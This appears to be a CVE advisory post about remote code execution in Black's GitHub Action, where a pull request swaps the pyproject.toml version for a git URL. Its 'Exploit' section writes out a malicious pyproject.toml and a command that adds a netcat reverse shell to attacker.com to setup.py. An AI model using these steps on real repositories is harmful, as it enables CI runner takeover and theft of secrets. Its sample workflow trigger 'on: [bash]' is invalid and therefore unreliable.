Black GitHub Action, RCE, CVE-pending (High)

Listen to this Post

The vulnerability in Black’s GitHub Action arises from its support for the `use_pyproject: true` option, which reads the Black version from the `pyproject.toml` file in a repository. When this option is enabled, the action parses the `version` field under `[tool.black]` to determine which Black version to install and use for formatting. An attacker can submit a malicious pull request that modifies the `pyproject.toml` file, replacing the version value with a direct URL reference to a malicious repository (e.g., git+https://malicious.com/black.git`). During the action's execution, it fetches and installs Black from this URL, leading to arbitrary code execution within the GitHub Action runner. This allows the attacker to access secrets, environment variables, and permissions available to the action, potentially compromising the entire workflow. The issue affects all versions before 26.3.0, where input validation was tightened to block non-version strings.
<h2 style="color: blue;">dailycve form:</h2>
Platform: Black GitHub Action
Version: before 26.3.0
Vulnerability: RCE from version parsing
Severity: High
date: 6 Mar 2026
<h2 style="color: blue;">Prediction: Patched 7 Mar 2026</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
<h2 style="color: blue;">Analytics:</h2>

Check Black version in current GitHub Action environment
black --version
Simulate vulnerable workflow in local test
git clone https://github.com/psf/black
cd black
echo -e "[tool.black]\nversion = \"git+https://github.com/attacker/malicious-black.git\"" > pyproject.toml
Run action locally (requires act tool)
act -j test-job --secret GITHUB_TOKEN=test
Monitor GitHub Action logs for suspicious installations
grep -i "pip install.git+" /path/to/action.log

<h2 style="color: blue;">Exploit:</h2>

Malicious pyproject.toml in pull request
[tool.black]
version = "git+https://github.com/attacker/malicious-black.git@main"
Attacker's malicious repository setup
git clone https://github.com/attacker/malicious-black
cd malicious-black
Inject reverse shell in setup.py
echo 'import os; os.system("nc -e /bin/sh attacker.com 4444")' >> setup.py
git add setup.py
git commit -m "Add backdoor"
git push origin main

<h2 style="color: blue;">Protection from this CVE:</h2>

Secure GitHub Action workflow (use_pyproject disabled)
name: Format with Black
on: [bash]
jobs:
format:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: psf/black@stable
with:
use_pyproject: false
version: "26.3.0"
Upgrade to patched version via CLI
pip install black==26.3.0
Verify update
black --version | grep "26.3.0"

<h2 style="color: blue;">Impact:</h2>
- Arbitrary code execution in GitHub Action runners.
- Exposure of secrets (e.g.,
GITHUB_TOKEN`, API keys) and permissions.
– Compromise of CI/CD pipelines, leading to supply chain attacks.
– Unauthorized access to repository data and downstream systems.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top